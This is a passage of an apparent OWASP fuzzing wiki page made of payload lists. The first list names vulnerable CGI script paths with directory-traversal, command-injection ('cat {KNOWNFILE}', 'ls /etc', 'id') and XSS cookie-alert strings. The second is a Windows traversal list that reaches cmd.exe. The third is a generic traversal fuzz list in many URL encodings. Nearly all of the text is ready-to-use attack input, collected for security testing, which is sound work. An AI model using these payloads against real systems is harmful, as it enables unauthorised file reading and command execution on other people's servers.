mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Windows Directory Traversal   (Update: 17 March 2010  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Windows Directory Traversal   (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
